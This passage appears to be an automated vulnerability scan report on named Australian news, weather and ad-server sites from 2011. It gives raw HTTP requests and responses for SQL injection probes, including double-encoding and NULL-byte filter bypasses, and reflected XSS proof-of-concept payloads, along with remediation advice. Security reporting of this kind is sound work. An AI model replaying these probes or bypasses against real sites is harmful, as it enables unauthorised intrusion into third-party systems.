The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://data.weatherzone.com.au/json/animator/ [df parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.weatherzone.com.au
Path:   /json/animator/

Issue detail

The df parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the df parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z'&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 2457
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:20 GMT
Date: Wed, 07 Sep 2011 14:17:10 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>org.apache.jasper.JasperException: java.lang.IllegalArgumentException: Unterminated quote
   org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:522)
   org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.20 logs.</u>
...[SNIP]...

Request 2

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z''&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1101
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:21 GMT
Date: Wed, 07 Sep 2011 14:17:11 GMT
Connection: close
Vary: Accept-Encoding


cbrad070({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "ti
...[SNIP]...

1.2. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.ntnews.com.au
Path:   //admin/gallery_images/remote/2011/02/06/tn_165705.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:14 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n14), ms lax-agg-n14 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:14 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg'' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:16 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/02/06/tn_165705.jpg''
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.3. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.ntnews.com.au
Path:   //admin/gallery_images/remote/2011/07/13/tn_197121.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n54), ms lax-agg-n54 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:20 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:21 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/07/13/tn_197121.jpg%27%27
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.4. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php [category_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tools.ntnews.com.au
Path:   /photo-gallery/photo_galleries_js.php

Issue detail

The category_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the category_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351'&title=Photo%20Galleries HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:46 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n51), ms lax-agg-n51 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:21:47 GMT
Age: 0
Content-Length: 240
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_All_Photo_Categorys: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND ec.active = 'Y' GROUP BY ec.category_id ORDER BY displayorder' at line 9

1.5. http://tools.themercury.com.au/admin/gallery_images/remote/2011/09/06/345781.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /admin/gallery_images/remote/2011/09/06/345781.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /admin'/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Wed, 07 Sep 2011 14:19:01 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n18), ms lax-agg-n18 ( origin>CONN)
Retry-After: 0
Cache-Control: no-cache
Content-Length: 321
Content-Type: text/html; charset=utf-8
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailabl
...[SNIP]...
<h1>Error 503 Service Unavailable</h1>
...[SNIP]...

Request 2

GET /admin''/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:19:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n37), ms lax-agg-n37 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.6. http://tools.themercury.com.au/feeds/feed-with-lead.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /feeds'/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:17 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n53), ms lax-agg-n53 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:18 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET /feeds''/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:18:19 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.7. http://tools.themercury.com.au/feeds/feed-with-lead.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00'=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n46), ms lax-agg-n46 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:19 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!-- failover -->

Request 2

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00''=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:21 GMT
Age: 0
Content-Length: 1482
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news.php" ><img src="http://res
...[SNIP]...

1.8. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tools.themercury.com.au
Path:   /yoursay/yoursay-single-extract.php

Issue detail

The range parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the range parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /yoursay/yoursay-single-extract.php?range=0to1' HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:53 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n17), ms lax-agg-n17 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:54 GMT
Age: 0
Content-Length: 167
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3

2. Cross-site scripting (reflected)
There are 91 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73d0"><script>alert(1)</script>64a7d9f07a6 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAABwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fm19rYKZg5%2FzAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=629767453?imid=7889652898655870963&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2738"><script>alert(1)</script>aaf70b1dcec was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8flXuAmg0WtthAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect=http://ad.agkn.com/interaction!che=1113815159?imid=6191889184259234657&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31576"><script>alert(1)</script>5388910874 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

